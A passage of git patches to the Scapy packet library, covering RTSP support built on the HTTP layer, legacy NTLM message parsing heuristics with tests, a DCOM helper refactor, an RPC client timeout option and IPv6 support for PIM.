self_build(self, **kwargs): return self.raw_packet_cache p = b"" # Walk all the fields, in order - for f in self.fields_desc: + for i, f in enumerate(self.fields_desc): if f.name == "Unknown_Headers": continue # Get the field value @@ -391,21 +391,15 @@ def self_build(self, **kwargs): if not val: # Not specified. Skip continue - if f.name not in ['Method', 'Path', 'Reason_Phrase', - 'Http_Version', 'Status_Code']: + + if i >= 3: val = _header_line(f.real_name, val) # Fields used in the first line have a space as a separator, # whereas headers are terminated by a new line - if isinstance(self, HTTPRequest): - if f.name in ['Method', 'Path']: - separator = b' ' - else: - separator = b'\r\n' - elif isinstance(self, HTTPResponse): - if f.name in ['Http_Version', 'Status_Code']: - separator = b' ' - else: - separator = b'\r\n' + if i <= 1: + separator = b' ' + else: + separator = b'\r\n' # Add the field into the packet p = f.addfield(self, p, val + separator) # Handle Unknown_Headers @@ -425,6 +419,8 @@ def self_build(self, **kwargs): def guess_payload_class(self, payload): """Detect potential payloads """ + if not hasattr(self, "Connection"): + return super(_HTTPContent, self).guess_payload_class(payload) if self.Connection and b"Upgrade" in self.Connection: from scapy.contrib.http2 import H2Frame return H2Frame @@ -549,6 +545,19 @@ class HTTP(Packet): name = "HTTP 1" fields_desc = [] show_indent = 0 + clsreq = HTTPRequest + clsresp = HTTPResponse + hdr = b"HTTP" + reqmethods = b"|".join([ + b"OPTIONS", + b"GET", + b"HEAD", + b"POST", + b"PUT", + b"DELETE", + b"TRACE", + b"CONNECT", + ]) @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): @@ -582,7 +591,7 @@ def tcp_reassemble(cls, data, metadata, _): is_unknown = metadata.get("detect_unknown", True) if not detect_end or is_unknown: metadata["detect_unknown"] = False - http_packet = HTTP(data) + http_packet = cls(data) # Detect packing method if not isinstance(http_packet.payload, _HTTPContent): return http_packet @@ -602,14 +611,14 @@ def tcp_reassemble(cls, data, metadata, _): metadata["detect_unknown"] = True else: # It's not Content-Length based. It could be chunked - encodings = http_packet[HTTP].payload._get_encodings() + encodings = http_packet[cls].payload._get_encodings() chunked = ("chunked" in encodings) - is_response = isinstance(http_packet.payload, HTTPResponse) + is_response = isinstance(http_packet.payload, cls.clsresp) if chunked: detect_end = lambda dat: dat.endswith(b"0\r\n\r\n") # HTTP Requests that do not have any content, # end with a double CRLF - elif isinstance(http_packet.payload, HTTPRequest): + elif isinstance(http_packet.payload, cls.clsreq): detect_end = lambda dat: dat.endswith(b"\r\n\r\n") # In case we are handling a HTTP Request, # we want to continue assessing the data, @@ -631,7 +640,7 @@ def tcp_reassemble(cls, data, metadata, _): return http_packet else: if detect_end(data): - http_packet = HTTP(data) + http_packet = cls(data) return http_packet def guess_payload_class(self, payload): @@ -640,20 +649,20 @@ def guess_payload_class(self, payload): """ try: prog = re.compile( - br"^(?:OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) " - br"(?:.+?) " - br"HTTP/\d\.\d$" + br"^(?:" + self.reqmethods + br") " + + br"(?:.+?) " + + self.hdr + br"/\d\.\d$" ) crlfIndex = payload.index(b"\r\n") req = payload[:crlfIndex] result = prog.match(req) if result: - return HTTPRequest + return self.clsreq else: - prog = re.compile(br"^HTTP/\d\.\d \d\d\d .*$") + prog = re.compile(b"^" + self.hdr + br"/\d\.\d \d\d\d .*$") result = prog.match(req) if result: - return HTTPResponse + return self.clsresp except ValueError: # Anything that isn't HTTP but on port 80 pass diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index ba000311f13..99f53fd62f5 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -9,6 +9,7 @@ https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/4a893f3d-bd29-48cd-9f43-d9777a4415b0 """ +import collections import uuid from scapy.config import conf @@ -481,14 +482,18 @@ def ServerAlive2(self): """ resp = self.sr1_req(ServerAlive2_Request(ndr64=False)) binds, secs = _parseStringArray(resp.ppdsaOrBindings.value) - print("Addresses:") + DCOMResults = collections.namedtuple('DCOMResults', ['addresses', 'ssps']) + addresses = [] + ssps = [] for b in binds: if b.wTowerId == 0: continue - print("- %s" % b.aNetworkAddr) - print("Supported RPC Security Providers:") + addresses.append(b.aNetworkAddr) for b in secs: - print("- %s%s" % ( - b.sprintf("%wAuthnSvc%"), - b.aPrincName and "%s/" % b.aPrincName or "", - )) + ssps.append( + "%s%s" % ( + b.sprintf("%wAuthnSvc%"), + b.aPrincName and "%s/" % b.aPrincName or "", + ) + ) + return DCOMResults(addresses, ssps) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index ddc10a24fa5..80f4c2055f9 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -85,7 +85,7 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): client.sock = DceRpcSocket(sock, DceRpc5, ssp=client.ssp) return client - def connect(self, ip, port=None, smb_kwargs={}): + def connect(self, ip, port=None, timeout=5, smb_kwargs={}): """ Initiate a connection """ @@ -99,7 +99,7 @@ def connect(self, ip, port=None, smb_kwargs={}): "Can't guess the port for transport: %s" % self.transport ) sock = socket.socket() - sock.settimeout(5) + sock.settimeout(timeout) if self.verb: print( "\u2503 Connecting to %s on port %s via %s..." diff --git a/test/contrib/rtsp.uts b/test/contrib/rtsp.uts new file mode 100644 index 00000000000..9f1b5430ac4 --- /dev/null +++ b/test/contrib/rtsp.uts @@ -0,0 +1,32 @@ +% RTSP tests + ++ RTSP - Dissection and Build tests + += RTSP request - dissection + +pkt = Ether(b'\xbc\xdf \x00\x02\x00\x00\x00\x02\x00\x00\x00\x08\x00E\x00\x01\xde\x16\xca@\x00\x80\x06\xf9\xb8Q\x83\xe7CR\xd3\\\xfd\x0fU\x02*\xbf\xd4\xcb\xa4~\n\x19DP\x18"8\x86n\x00\x00DESCRIBE rtsp://EMAP1.planetwideradio.com/tfm RTSP/1.0\r\nUser-Agent: WMPlayer/10.0.0.380 guid/7405E143-26AC-4B37-9802-A35EE8C6CFA7\r\nAccept: application/sdp\r\nAccept-Charset: UTF-8, *;q=0.1\r\nX-Accept-Authentication: Negotiate, NTLM, Digest, Basic\r\nAccept-Language: en-GB, *;q=0.1\r\nCSeq: 1\r\nSupported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.predstrm, com.microsoft.wm.startupprofile\r\n\r\n') +assert RTSPRequest in pkt +assert pkt.Method == b"DESCRIBE" +assert pkt.Request_Uri == b"rtsp://EMAP1.planetwideradio.com/tfm" +assert pkt.Version == b"RTSP/1.0" +assert pkt.Accept == b"application/sdp" +assert pkt.User_Agent == b"WMPlayer/10.0.0.380 guid/7405E143-26AC-4B37-9802-A35EE8C6CFA7" + += RTSP request - build + +rebuild = RTSP() / RTSPRequest(Accept=b'application/sdp', Accept_Language=b'en-GB, *;q=0.1', User_Agent=b'WMPlayer/10.0.0.380 guid/7405E143-26AC-4B37-9802-A35EE8C6CFA7', Unknown_Headers={b'Accept-Charset': b'UTF-8, *;q=0.1', b'X-Accept-Authentication': b'Negotiate, NTLM, Digest, Basic', b'CSeq': b'1', b'Supported': b'com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.predstrm, com.microsoft.wm.startupprofile'}, Method=b'DESCRIBE', Request_Uri=b'rtsp://EMAP1.planetwideradio.com/tfm', Version=b'RTSP/1.0') +assert bytes(rebuild) == b'DESCRIBE rtsp://EMAP1.planetwideradio.com/tfm RTSP/1.0\r\nAccept: application/sdp\r\nAccept-Language: en-GB, *;q=0.1\r\nUser-Agent: WMPlayer/10.0.0.380 guid/7405E143-26AC-4B37-9802-A35EE8C6CFA7\r\nAccept-Charset: UTF-8, *;q=0.1\r\nX-Accept-Authentication: Negotiate, NTLM, Digest, Basic\r\nCSeq: 1\r\nSupported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.predstrm, com.microsoft.wm.startupprofile\r\n\r\n' + += RTSP response - dissection + +pkt = Ether(b'\x00\x02\xb3L\xf6\xb2\x00 \x9cR\x93`\x08\x00E\x80\x02cY\x13@\x00p\x06\xa9\x91\xd8@\xbe=\n\xc9d)\x02*\t\x9d\xf7p\xe8O\x10\xfcz\x9fP\x18\xfc\xc0\x91L\x00\x00RTSP/1.0 200 OK\r\nTransport: RTP/AVP/UDP;unicast;server_port=5004-5005;client_port=2462-2463;ssrc=927717de;mode=PLAY\r\nDate: Sun, 06 Nov 2005 12:19:47 GMT\r\nCSeq: 2\r\nSession: 17555940012607716235;timeout=60\r\nServer: WMServer/9.1.1.3814\r\nSupported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile\r\nLast-Modified: Thu, 20 Oct 2005 16:30:11 GMT\r\nCache-Control: x-wms-content-size=84457, max-age=86398, must-revalidate, proxy-revalidate\r\nEtag: "84457"\r\n\r\n') +assert RTSPResponse in pkt +assert pkt.Version == b"RTSP/1.0" +assert pkt.Status_Code == b"200" +assert pkt.Reason_Phrase == b"OK" +assert pkt.Server == b"WMServer/9.1.1.3814" + += RTSP response - build + +rebuild = RTSP() / RTSPResponse(Server=b'WMServer/9.1.1.3814', Unknown_Headers={b'Transport': b'RTP/AVP/UDP;unicast;server_port=5004-5005;client_port=2462-2463;ssrc=927717de;mode=PLAY', b'Date': b'Sun, 06 Nov 2005 12:19:47 GMT', b'CSeq': b'2', b'Session': b'17555940012607716235;timeout=60', b'Supported': b'com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile', b'Last-Modified': b'Thu, 20 Oct 2005 16:30:11 GMT', b'Cache-Control': b'x-wms-content-size=84457, max-age=86398, must-revalidate, proxy-revalidate', b'Etag': b'"84457"'}, Version=b'RTSP/1.0', Status_Code=b'200', Reason_Phrase=b'OK') +assert bytes(rebuild) == b'RTSP/1.0 200 OK\r\nServer: WMServer/9.1.1.3814\r\nTransport: RTP/AVP/UDP;unicast;server_port=5004-5005;client_port=2462-2463;ssrc=927717de;mode=PLAY\r\nDate: Sun, 06 Nov 2005 12:19:47 GMT\r\nCSeq: 2\r\nSession: 17555940012607716235;timeout=60\r\nSupported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile\r\nLast-Modified: Thu, 20 Oct 2005 16:30:11 GMT\r\nCache-Control: x-wms-content-size=84457, max-age=86398, must-revalidate, proxy-revalidate\r\nEtag: "84457"\r\n\r\n' From e3fb112c23adda6372dd918f48c0bf7a2d9ca8cd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 19 Feb 2024 23:12:44 +0100 Subject: [PATCH 1215/1632] Add tons of heuristics to parse old NTLM (#4292) Co-authored-by: gpotter2 --- scapy/layers/ntlm.py | 57 ++++++++++++++++++++++++++++++-------- test/scapy/layers/ntlm.uts | 38 +++++++++++++++++++++---- 2 files changed, 78 insertions(+), 17 deletions(-) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index e50771d5694..7097d3fd767 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -482,7 +482,9 @@ class _NTLM_Version(Packet): class NTLM_NEGOTIATE(_NTLMPayloadPacket): name = "NTLM Negotiate" MessageType = 1 - OFFSET = 40 + OFFSET = lambda pkt: ( + ((pkt.DomainNameBufferOffset or 40) > 32) and 40 or 32 + ) fields_desc = [ NTLM_Header, FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), @@ -494,8 +496,20 @@ class NTLM_NEGOTIATE(_NTLMPayloadPacket): LEShortField("WorkstationNameLen", None), LEShortField("WorkstationNameMaxLen", None), LEIntField("WorkstationNameBufferOffset", None), + ] + [ # VERSION - _NTLM_Version, + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + x, + lambda pkt: ( + ( + 40 if pkt.DomainNameBufferOffset is None else + pkt.DomainNameBufferOffset or len(pkt.original or b"") + ) > 32 + ) + or pkt.fields.get(x.name, b""), + ) for x in _NTLM_Version.fields_desc + ] + [ # Payload _NTLMPayloadField( "Payload", @@ -510,7 +524,7 @@ def post_build(self, pkt, pay): _NTLM_post_build( self, pkt, - self.OFFSET, + self.OFFSET(), { "DomainName": 16, "WorkstationName": 24, @@ -600,7 +614,9 @@ def default_payload_class(self, payload): class NTLM_CHALLENGE(_NTLMPayloadPacket): name = "NTLM Challenge" MessageType = 2 - OFFSET = 56 + OFFSET = lambda pkt: ( + ((pkt.TargetInfoBufferOffset or 56) > 48) and 56 or 48 + ) fields_desc = [ NTLM_Header, # TargetNameFields @@ -615,8 +631,15 @@ class NTLM_CHALLENGE(_NTLMPayloadPacket): LEShortField("TargetInfoLen", None), LEShortField("TargetInfoMaxLen", None), LEIntField("TargetInfoBufferOffset", None), + ] + [ # VERSION - _NTLM_Version, + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + x, + lambda pkt: ((pkt.TargetInfoBufferOffset or 56) > 40) + or pkt.fields.get(x.name, b""), + ) for x in _NTLM_Version.fields_desc + ] + [ # Payload _NTLMPayloadField( "Payload", @@ -640,7 +663,7 @@ def post_build(self, pkt, pay): _NTLM_post_build( self, pkt, - self.OFFSET, + self.OFFSET(), { "TargetName": 12, "TargetInfo": 40, @@ -730,8 +753,11 @@ def computeNTProofStr(self, ResponseKeyNT, ServerChallenge): class NTLM_AUTHENTICATE(_NTLMPayloadPacket): name = "NTLM Authenticate" MessageType = 3 - OFFSET = 88 NTLM_VERSION = 1 + OFFSET = lambda pkt: ( + ((pkt.DomainNameBufferOffset or 88) <= 64) and 64 + or (((pkt.DomainNameBufferOffset or 88) > 72) and 88 or 72) + ) fields_desc = [ NTLM_Header, # LmChallengeResponseFields @@ -761,7 +787,14 @@ class NTLM_AUTHENTICATE(_NTLMPayloadPacket): # NegotiateFlags FlagsField("NegotiateFlags", 0, -32, _negotiateFlags), # VERSION - _NTLM_Version, + ] + [ + ConditionalField( + # (not present on some old Windows versions. We use a heuristic) + x, + lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 64) + or pkt.fields.get(x.name, b""), + ) for x in _NTLM_Version.fields_desc + ] + [ # MIC ConditionalField( # (not present on some old Windows versions. We use a heuristic) @@ -772,7 +805,7 @@ class NTLM_AUTHENTICATE(_NTLMPayloadPacket): # Payload _NTLMPayloadField( "Payload", - lambda pkt: ((pkt.DomainNameBufferOffset or 88) > 72) and 88 or 72, + OFFSET, [ MultipleTypeField( [ @@ -812,7 +845,7 @@ def post_build(self, pkt, pay): _NTLM_post_build( self, pkt, - ((self.DomainNameBufferOffset or 88) > 72) and 88 or 72, + self.OFFSET(), { "LmChallengeResponse": 12, "NtChallengeResponse": 20, @@ -1168,6 +1201,7 @@ def __init__( DROP_MIC_v1=False, DROP_MIC_v2=False, DO_NOT_CHECK_LOGIN=False, + SERVER_CHALLENGE=None, **kwargs, ): self.UPN = UPN @@ -1186,6 +1220,7 @@ def __init__( self.DO_NOT_CHECK_LOGIN = DO_NOT_CHECK_LOGIN self.DROP_MIC_v1 = DROP_MIC_v1 self.DROP_MIC_v2 = DROP_MIC_v2 + self.SERVER_CHALLENGE = SERVER_CHALLENGE super(NTLMSSP, self).__init__(**kwargs) def LegsAmount(self, Context: CONTEXT): @@ -1489,7 +1524,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # Take a default token currentTime = (time.time() + 11644473600) * 1e7 tok = NTLM_CHALLENGE( - ServerChallenge=os.urandom(8), + ServerChallenge=self.SERVER_CHALLENGE or os.urandom(8), NegotiateFlags="+".join( [ "NEGOTIATE_UNICODE", diff --git a/test/scapy/layers/ntlm.uts b/test/scapy/layers/ntlm.uts index 1f37d11f330..6a241381055 100644 --- a/test/scapy/layers/ntlm.uts +++ b/test/scapy/layers/ntlm.uts @@ -318,7 +318,7 @@ except ValueError: + GSSAPI - Verify real exchange -= Parse token 0 from server += Real exchange - Parse token 0 from server from scapy.layers.gssapi import GSSAPI_BLOB @@ -332,7 +332,7 @@ b"\xa0\x26\x1b\x24\x6e\x6f\x74\x5f\x64\x65\x66\x69\x6e\x65\x64\x5f" \ b"\x69\x6e\x5f\x52\x46\x43\x34\x31\x37\x38\x40\x70\x6c\x65\x61\x73" \ b"\x65\x5f\x69\x67\x6e\x6f\x72\x65") -= Create server SPNEGOSSP += Real exchange - Create server SPNEGOSSP from scapy.layers.ntlm import NTLM_NEGOTIATE, MD4le from scapy.layers.spnego import SPNEGOSSP @@ -348,7 +348,7 @@ server = SPNEGOSSP( force_supported_mechtypes=tok0.innerToken.token.mechTypes ) -= Parse token 1 from client += Real exchange - Parse token 1 from client tok1 = GSSAPI_BLOB( b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e" \ @@ -360,7 +360,7 @@ b"\x00\x00\x0a\x00\x61\x4a\x00\x00\x00\x0f") srvcontext, _, negResult = server.GSS_Accept_sec_context(None, tok1) assert negResult == 1 -= Inject token 2 from server += Real exchange - Inject token 2 from server tok2 = GSSAPI_BLOB( b"\xa1\x81\xca\x30\x81\xc7\xa0\x03\x0a\x01\x01\xa1\x0c\x06\x0a\x2b" \ @@ -382,7 +382,7 @@ tok2.token.responseToken.value.show() # Inject challenge token srvcontext.sub_context.chall_tok = tok2.token.responseToken.value -= Parse token 3 from client += Real exchange - Parse token 3 from client tok3 = GSSAPI_BLOB( b"\xa1\x82\x01\xd7\x30\x82\x01\xd3\xa0\x03\x0a\x01\x01\xa2\x82\x01" \ @@ -420,7 +420,7 @@ b"\x96\x54\xbb\x55\xd0\x6c\xcb\x00\x00\x00\x00") srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok3) assert negResult == 0 -= Check mechListMIC against token 4 from server += Real exchange - Check mechListMIC against token 4 from server tok4 = GSSAPI_BLOB( b"\xa1\x1b\x30\x19\xa0\x03\x0a\x01\x00\xa3\x12\x04\x10\x01\x00\x00" \ @@ -429,3 +429,29 @@ b"\x00\xe3\x39\x61\x56\xbc\x42\x23\xdc\x00\x00\x00\x00") tok.show() tok4.show() assert tok.token.mechListMIC == tok4.token.mechListMIC + += MISC - Dissect legacy formed NTLM messages + +# NTLM Negotiate with missing everything + +data = b'NTLMSSP\x00\x01\x00\x00\x00\x05\x02\x88\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +pkt = NTLM_Header(data) +assert pkt.WorkstationNameLen == 0 +assert pkt.ProductMajorVersion is None + +pkt.clear_cache() +assert bytes(pkt) == data + + +# NTLM AUTH with missing version + +data = b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00d\x00\x00\x00\xb6\x00\xb6\x00|\x00\x00\x00\x08\x00\x08\x00@\x00\x00\x00\x10\x00\x10\x00H\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x00\x00\x00\x002\x01\x00\x005\x82\x89\x00C\x00O\x00U\x00S\x00B\x00A\x00N\x00A\x00N\x00A\x00N\x00A\x00G\x00O\x00U\x00R\x00D\x00E\x00\x91\xe9\xa2\xd8\xefE\xcd!2\xe8r\xae\x17*\xbfq\xbe8\x0b4\x90\x98\x12\x00s\x9e\x9e\xdc\nj(q\x1f\x84\xf8\xd3\x90e\xa7\xb3\x01\x01\x00\x00\x00\x00\x00\x00\x80\x8ax\xeeXc\xda\x01\xbe8\x0b4\x90\x98\x12W\x00\x00\x00\x00\x01\x00\x06\x00S\x00R\x00V\x00\x02\x00\x0c\x00D\x00O\x00M\x00A\x00I\x00N\x00\x03\x00 \x00s\x00r\x00v\x00.\x00d\x00o\x00m\x00a\x00i\x00n\x00.\x00l\x00o\x00c\x00a\x00l\x00\x04\x00\x18\x00d\x00o\x00m\x00a\x00i\x00n\x00.\x00l\x00o\x00c\x00a\x00l\x00\x05\x00\x18\x00d\x00o\x00m\x00a\x00i\x00n\x00.\x00l\x00o\x00c\x00a\x00l\x00\x07\x00\x08\x00\x90\xa8;}Qc\xda\x01\x00\x00\x00\x00\x00\x00\x00\x00' + +pkt = NTLM_Header(data) +assert pkt.Workstation == "GOURDE" +assert pkt.DomainName == "COUS" +assert pkt.UserName == "BANANANA" + +pkt.clear_cache() +assert bytes(pkt) == data From 9b061e918de73b5b60fa88a49207119e4f83680d Mon Sep 17 00:00:00 2001 From: fusemich Date: Tue, 20 Feb 2024 16:40:52 +0900 Subject: [PATCH 1216/1632] Support IPv6 in contrib/pim.py (#4282) * IPv6 would be added to contrib/pim.py #4274 * pim.py has been rewritten with MultipleTypeFeilds * contrib/pim.py has been updated according to PEP8(tox -e flake8) --- scapy/contrib/pim.py | 63 ++++++++++++-- test/contrib/pim.uts | 191 +++++++++++++++++++++++++++++++++++++------ 2 files changed, 224 insertions(+), 30 deletions(-) diff --git a/scapy/contrib/pim.py b/scapy/contrib/pim.py index e4f91a00697..1b568eaaad1 100644 --- a/scapy/contrib/pim.py +++ b/scapy/contrib/pim.py @@ -12,9 +12,10 @@ import struct from scapy.packet import Packet, bind_layers from scapy.fields import BitFieldLenField, BitField, BitEnumField, ByteField, \ - ShortField, XShortField, IPField, PacketListField, \ - IntField, FieldLenField, BoundStrLenField + ShortField, XShortField, IPField, IP6Field, PacketListField, \ + IntField, FieldLenField, BoundStrLenField, MultipleTypeField from scapy.layers.inet import IP +from scapy.layers.inet6 import IPv6, in6_chksum, _IPv6ExtHdr from scapy.utils import checksum from scapy.compat import orb from scapy.config import conf @@ -53,8 +54,21 @@ def post_build(self, p, pay): """ p += pay if self.chksum is None: - ck = checksum(p) - p = p[:2] + struct.pack("!H", ck) + p[4:] + if isinstance(self.underlayer, IP): + ck = checksum(p) + # ck = in4_chksum(103, self.underlayer, p) + # According to RFC768 if the result checksum is 0, it should be set to 0xFFFF # noqa: E501 + if ck == 0: + ck = 0xFFFF + p = p[:2] + struct.pack("!H", ck) + p[4:] + + elif isinstance(self.underlayer, IPv6) or isinstance(self.underlayer, _IPv6ExtHdr): # noqa: E501 + ck = in6_chksum(103, self.underlayer, p) # noqa: E501 + # According to RFC2460 if the result checksum is 0, it should be set to 0xFFFF # noqa: E501 + if ck == 0: + ck = 0xFFFF + p = p[:2] + struct.pack("!H", ck) + p[4:] + return p @@ -170,12 +184,34 @@ class PIMv2HelloStateRefresh(_PIMv2GenericHello): ] +class PIMv2HelloAddrListValue(_PIMv2GenericHello): + name = "PIMv2 Hello Options : Address List Value" + fields_desc = [ + ByteField("addr_family", 1), + ByteField("encoding_type", 0), + IP6Field("prefix", "::"), + ] + + +class PIMv2HelloAddrList(_PIMv2GenericHello): + name = "PIMv2 Hello Options : Address List" + fields_desc = [ + ShortField("type", 24), + FieldLenField( + "length", None, length_of="value" , fmt="!H" + ), + PacketListField("value", PIMv2HelloAddrListValue(), + PIMv2HelloAddrListValue) + ] + + PIMv2_HELLO_CLASSES = { 1: PIMv2HelloHoldtime, 2: PIMv2HelloLANPruneDelay, 19: PIMv2HelloDRPriority, 20: PIMv2HelloGenerationID, 21: PIMv2HelloStateRefresh, + 24: PIMv2HelloAddrList, None: _PIMv2GenericHello, } @@ -192,7 +228,11 @@ class PIMv2JoinPruneAddrsBase(_PIMGenericTlvBase): BitField("wildcard", 0, 1), BitField("rpt", 1, 1), ByteField("mask_len", 32), - IPField("src_ip", "0.0.0.0") + MultipleTypeField( + [(IP6Field("src_ip", "::"), + lambda pkt: pkt.addr_family == 2)], + IPField("src_ip", "0.0.0.0") + ), ] @@ -214,7 +254,11 @@ class PIMv2GroupAddrs(_PIMGenericTlvBase): BitField("reserved", 0, 6), BitField("admin_scope_zone", 0, 1), ByteField("mask_len", 32), - IPField("gaddr", "0.0.0.0"), + MultipleTypeField( + [(IP6Field("gaddr", "::"), + lambda pkt: pkt.addr_family == 2)], + IPField("gaddr", "0.0.0.0") + ), BitFieldLenField("num_joins", None, size=16, count_of="join_ips"), BitFieldLenField("num_prunes", None, size=16, count_of="prune_ips"), PacketListField("join_ips", [], PIMv2JoinAddrs, @@ -229,7 +273,11 @@ class PIMv2JoinPrune(_PIMGenericTlvBase): fields_desc = [ ByteField("up_addr_family", 1), ByteField("up_encoding_type", 0), - IPField("up_neighbor_ip", "0.0.0.0"), + MultipleTypeField( + [(IP6Field("up_neighbor_ip", "::"), + lambda pkt: pkt.up_addr_family == 2)], + IPField("up_neighbor_ip", "0.0.0.0") + ), ByteField("reserved", 0), FieldLenField("num_group", None, count_of="jp_ips", fmt="B"), ShortField("holdtime", 210), @@ -239,5 +287,6 @@ class PIMv2JoinPrune(_PIMGenericTlvBase): bind_layers(IP, PIMv2Hdr, proto=103) +bind_layers(IPv6, PIMv2Hdr, nh=103) bind_layers(PIMv2Hdr, PIMv2Hello, type=0) bind_layers(PIMv2Hdr, PIMv2JoinPrune, type=3) diff --git a/test/contrib/pim.uts b/test/contrib/pim.uts index 8aa4f7e2b1c..497e0d97958 100644 --- a/test/contrib/pim.uts +++ b/test/contrib/pim.uts @@ -83,33 +83,32 @@ assert (jp_pkt[PIMv2JoinPrune].jp_ips[2].prune_ips[0][PIMv2PruneAddrs].src_ip == = PIMv2 Hello - build hello_delay_pkt = Ether(dst="01:00:5e:00:00:0d", src="00:d0:cb:00:ba:e4")/IP(version=4, ihl=5, tos=0xc0, id=23037, ttl=1, proto=103, src="21.21.21.21", dst="224.0.0.13")/\ - PIMv2Hdr(version=2, type=0, reserved=0)/\ - PIMv2Hello(option=[PIMv2HelloHoldtime(type=1, holdtime=105), PIMv2HelloDRPriority(type=19, dr_priority=0), - PIMv2HelloLANPruneDelay(type=2, value=[PIMv2HelloLANPruneDelayValue(t=0, propagation_delay=500, override_interval=2500)]), - PIMv2HelloGenerationID(type=20, generation_id=459007194)]) + PIMv2Hdr(version=2, type=0, reserved=0)/\ + PIMv2Hello(option=[PIMv2HelloHoldtime(type=1, holdtime=105), PIMv2HelloDRPriority(type=19, dr_priority=0), + PIMv2HelloLANPruneDelay(type=2, value=[PIMv2HelloLANPruneDelayValue(t=0, propagation_delay=500, override_interval=2500)]), + PIMv2HelloGenerationID(type=20, generation_id=459007194)]) assert raw(hello_delay_pkt) == b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x006Y\xfd\x00\x00\x01gTm\x15\x15\x15\x15\xe0\x00\x00\r \x00\xd3p\x00\x01\x00\x02\x00i\x00\x13\x00\x04\x00\x00\x00\x00\x00\x02\x00\x04\x01\xf4\t\xc4\x00\x14\x00\x04\x1b[\xe4\xda' hello_refresh_pkt = Ether(dst="01:00:5e:00:00:0d", src="c2:01:52:72:00:00")/IP(version=4, ihl=5, tos=0xc0, id=121, ttl=1, proto=103, src="10.0.0.1", dst="224.0.0.13")/\ - PIMv2Hdr(version=2, type=0, reserved=0)/\ - PIMv2Hello(option=[PIMv2HelloHoldtime(type=1, holdtime=105), PIMv2HelloGenerationID(type=20, generation_id=3613938422), - PIMv2HelloDRPriority(type=19, dr_priority=1), - PIMv2HelloStateRefresh(type=21, value=[PIMv2HelloStateRefreshValue(version=1, interval=0, reserved=0)])]) + PIMv2Hdr(version=2, type=0, reserved=0)/\ + PIMv2Hello(option=[PIMv2HelloHoldtime(type=1, holdtime=105), PIMv2HelloGenerationID(type=20, generation_id=3613938422), + PIMv2HelloDRPriority(type=19, dr_priority=1), + PIMv2HelloStateRefresh(type=21, value=[PIMv2HelloStateRefreshValue(version=1, interval=0, reserved=0)])]) assert raw(hello_refresh_pkt) == b'\x01\x00^\x00\x00\r\xc2\x01Rr\x00\x00\x08\x00E\xc0\x006\x00y\x00\x00\x01g\xce\x1a\n\x00\x00\x01\xe0\x00\x00\r \x00\xb3\xeb\x00\x01\x00\x02\x00i\x00\x14\x00\x04\xd7hR\xf6\x00\x13\x00\x04\x00\x00\x00\x01\x00\x15\x00\x04\x01\x00\x00\x00' = PIMv2 Join/Prune - build join_pkt = Ether(dst="01:00:5e:00:00:0d", src="c2:02:3d:80:00:01")/IP(version=4, ihl=5, tos=0xc0, id=139, ttl=1, proto=103, src="10.0.0.14", dst="224.0.0.13")/\ - PIMv2Hdr(version=2, type=3, reserved=0)/\ - PIMv2JoinPrune(up_addr_family=1, up_encoding_type=0, up_neighbor_ip="10.0.0.13", reserved=0, num_group=1, holdtime=210, - jp_ips=[PIMv2GroupAddrs(addr_family=1, encoding_type=0, bidirection=0, reserved=0, admin_scope_zone=0, - mask_len=32, gaddr="239.123.123.123", - join_ips=[PIMv2JoinAddrs(addr_family=1, encoding_type=0, rsrvd=0, sparse=1, wildcard=1, - rpt=1, mask_len=32, src_ip="1.1.1.1")], - prune_ips=[]) - ] - ) + PIMv2Hdr(version=2, type=3, reserved=0)/\ + PIMv2JoinPrune(up_addr_family=1, up_encoding_type=0, up_neighbor_ip="10.0.0.13", reserved=0, num_group=1, holdtime=210, + jp_ips=[PIMv2GroupAddrs(addr_family=1, encoding_type=0, bidirection=0, reserved=0, admin_scope_zone=0, + mask_len=32, gaddr="239.123.123.123", + join_ips=[PIMv2JoinAddrs(addr_family=1, encoding_type=0, rsrvd=0, sparse=1, wildcard=1, + rpt=1, mask_len=32, src_ip="1.1.1.1")], + prune_ips=[]) + ] ) assert raw(join_pkt) == 